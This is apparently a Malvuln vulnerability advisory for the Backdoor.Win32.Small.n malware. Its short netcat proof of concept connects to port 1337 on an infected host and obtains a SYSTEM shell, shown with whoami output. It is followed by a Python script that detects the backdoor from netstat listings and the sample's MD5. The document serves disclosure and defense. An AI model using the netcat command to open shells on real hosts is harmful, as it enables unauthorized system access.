Code:
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/fb24c3509180f463c9deaf2ee6705062.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Small.n
Vulnerability: Unauthenticated Remote Command Execution (SYSTEM)
Description: The backdoor malware listens on TCP port 1337. Upon successful connection, we get handed a remote shell from the infected host with SYSTEM integrity.
Type: PE32
MD5: fb24c3509180f463c9deaf2ee6705062
Vuln ID: MVID-2021-0167
Dropped files:
Disclosure: 04/07/2021

Exploit/PoC:
nc64.exe MALWARE_HOST_IP 1337
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system
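
A defender-side check built on the two indicators in the advisory (TCP port 1337 and the sample's MD5), as an added example that is not part of the Malvuln advisory: it parses `netstat -ano` output and flags a listener, or sessions already accepted, on that port. The netstat sample, addresses, PIDs and function names are constructed for illustration.

```python
import hashlib
import re

# Indicators taken from the advisory above.
BACKDOOR_PORT = 1337
BACKDOOR_MD5 = "fb24c3509180f463c9deaf2ee6705062"

# Constructed sample of `netstat -ano -p TCP` output (not from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:1337           0.0.0.0:0              LISTENING       4212
  TCP    10.0.0.5:49731         10.0.0.9:1337          ESTABLISHED     3300
  TCP    10.0.0.5:1337          10.0.0.77:50112        ESTABLISHED     4212
  TCP    [::]:13370             [::]:0                 LISTENING       5120
"""

ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")

def scan_netstat(text, port=BACKDOOR_PORT):
    """Return (listeners, sessions) bound to the local `port`."""
    listeners, sessions = [], []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header or non-TCP row
        laddr, lport, raddr, rport, state, pid = m.groups()
        if int(lport) != port:
            continue  # skips outbound traffic to 1337 and ports such as 13370
        if state == "LISTENING":
            listeners.append((laddr, int(pid)))
        elif state == "ESTABLISHED":
            sessions.append((f"{raddr}:{rport}", int(pid)))
    return listeners, sessions

def is_known_sample(path):
    """Compare a file's MD5 with the hash published in the advisory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest() == BACKDOOR_MD5

if __name__ == "__main__":
    listeners, sessions = scan_netstat(SAMPLE_NETSTAT)
    for addr, pid in listeners:
        print(f"listener on {addr}:{BACKDOOR_PORT} owned by PID {pid}")
    for peer, pid in sessions:
        print(f"accepted session from {peer} handled by PID {pid}")
```

The PID returned for a listener is the value to resolve to an executable path before calling `is_known_sample` on that file; a port match alone does not identify the malware, since any program can bind 1337.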
 